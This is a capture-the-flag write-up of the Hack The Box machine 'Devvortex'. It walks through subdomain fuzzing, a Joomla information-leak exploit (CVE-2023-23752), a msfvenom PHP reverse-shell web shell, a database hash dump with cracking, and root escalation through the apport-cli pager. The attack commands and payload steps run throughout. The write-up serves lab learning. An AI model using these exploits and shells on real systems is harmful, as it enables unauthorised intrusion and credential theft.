Devvortex
# Tools
- haschat
- ffuf
- msfvenom
- mysql
## Getting User
### Nmap
┌──(kali㉿kali)-[~/htb/devvortex]
└─$ sudo nmap -sS -oA nmap/initial_scan 10.129.240.236
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 11:21 EST
Nmap scan report for 10.129.240.236
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds
┌──(kali㉿kali)-[~/htb/devvortex]
└─$ sudo nmap -sC -sV -p 22,80 10.129.240.236
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 11:29 EST
Nmap scan report for 10.129.240.236
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds
### Foothold
Added vhost to *hosts* file
┌──(kali㉿kali)-[~/htb/devvortex]
└─$ echo '10.129.240.236 devvortex.htb' | sudo tee -a /etc/hosts
10.129.240.236 devvortex.htb
Fuzzing the subdomains I found *dev* subdomain
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://devvortex.htb -H 'Host: FUZZ.devvortex.htb' -c -fs 154
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://devvortex.htb
:: Wordlist : FUZZ: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.devvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 192ms]
I’m gonna add the subdomain to *hosts* file
10.129.240.236 devvortex.htb dev.devvortex.htb
I found `http://dev.devvortex.htb/robots.txt` which contains
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html
User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
`http://dev.devvortex.htb/administrator/` is a Joomla admin login page
`http://dev.devvortex.htb/administrator/manifests/files/joomla.xml` exposes version of Joomla
<extension type="file" method="upgrade">
<name>files_joomla</name>
<author>Joomla! Project</author>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<copyright>(C) 2019 Open Source Matters, Inc.</copyright>
<license>
GNU General Public License version 2 or later; see LICENSE.txt
</license>
<version>4.2.6</version>
----------------------SNIPPED----------------------------
*Joomla 4.2.6* is vulnerable to an authentication bypass which results in information leak (*CVE-2023-23752*), which if I go to `http://dev.devvortex.htb/api/index.php/v1/config/application?public=true`, it will reveal the login credentials
user "lewis"
password "P4ntherg0t1n5r3c0n##"
Now that i’m able to login, I can gain RCE by adding a PHP payload to the template (https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla)
Created a PHP payload using msfvenom
┌──(kali㉿kali)-[~/htb/devvortex/files]
└─$ msfvenom -p php/meterpreter LHOST=10.10.14.107 LPORT=1234 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 2997 bytes
Saved as: shell.php
Heading to *Sytem* > *Site Templates* > *Cassiopeeia Details and Files*
Opened `error.php`, and replaced the contents of the whole file with what’s in shell.php
Listen on port 1234
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ..
Now if I curl, we get a shell
┌──(kali㉿kali)-[~]
└─$ curl -s http://dev.devvortex.htb/templates/cassiopeia/error.php
Upgrading the shell to an interactive one
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.107] from (UNKNOWN) [10.129.240.236] 50866
Upgrade shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Found `configuration.php` file in *www*
It has Mysql info
cat configuration.php
<?php
class JConfig {
public $offline = false;
public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
public $display_offline_message = 1;
public $offline_image = '';
public $sitename = 'Development';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = 20;
public $access = 1;
public $debug = false;
public $debug_lang = false;
public $debug_lang_const = true;
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';
public $db = 'joomla';
public $dbprefix = 'sd4fg_';
public $dbencryption = 0;
public $dbsslverifyservercert = false;
public $dbsslkey = '';
public $dbsslcert = '';
public $dbsslca = '';
public $dbsslcipher = '';
public $force_ssl = 0;
public $live_site = '';
public $secret = 'ZI7zLTbaGKliS9gq';
public $gzip = false;
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
public $offset = 'UTC';
public $mailonline = true;
public $mailer = 'mail';
public $mailfrom = 'lewis@devvortex.htb';
public $fromname = 'Development';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = false;
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = 25;
public $caching = 0;
public $cache_handler = 'file';
public $cachetime = 15;
public $cache_platformprefix = false;
public $MetaDesc = '';
public $MetaAuthor = true;
public $MetaVersion = false;
public $robots = '';
public $sef = true;
public $sef_rewrite = false;
public $sef_suffix = false;
public $unicodeslugs = false;
public $feed_limit = 10;
public $feed_email = 'none';
public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
public $lifetime = 15;
public $session_handler = 'database';
public $shared_session = false;
public $session_metadata = true;
}
Connect to Mysql
<b/templates/cassiopeia$ mysql -u lewis -D joomla -p
Enter password: P4ntherg0t1n5r3c0n##
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 121
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show tables;
------------------------
select * from sd4fg_users;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis | lewis | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | 0 | 1 | 2023-09-25 16:44:24 | 2023-12-01 20:51:04 | 0 | | NULL | 0 | | | 0 | |
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 | 0 | 0 | 2023-09-26 19:15:42 | NULL | | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL | 0 | | | 0 | |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)
Cracked the password using hashcat
┌──(kali㉿kali)-[~/htb/devvortex/files]
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt -m 3200
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho
Now i can connect to the server using logan’s credentials
┌──(kali㉿kali)-[~]
└─$ ssh logan@devvortex.htb
logan@devvortex:~$ ls
user.txt
logan@devvortex:~$ cat user.txt
## Getting Root
### Information Gathering
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ apport-cli -v
2.20.11
Did some searching and found a vulnerability in this version that allows us to escalate privilege using the pager (CVE-2023-1326)
### Privilege Escalation
Open the pager by viewing the report with **V** option and enter `!sh` to escalate privilege
logan@devvortex:~$ sudo apport-cli python3
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
..................
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (3.6 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): v
2.20.11-0ubuntu27
== Architecture =================================
amd64
== CasperMD5CheckResult =================================
skip
== Date =================================
Fri Dec 1 21:48:28 2023
== Dependencies =================================
adduser 3.118ubuntu2
apt 2.0.10
apt-utils 2.0.10
libcap-ng0 0.7.9-2.1build1
libcrypt1 1:4.4.10-10ubuntu4
libdb5.3 5.3.28+dfsg1-0.6ubuntu2
libexpat1 2.2.9-1ubuntu0.6
!sh
# ls
# cd /root
# cat root.txt
ce455d27f86cab03091dd22204******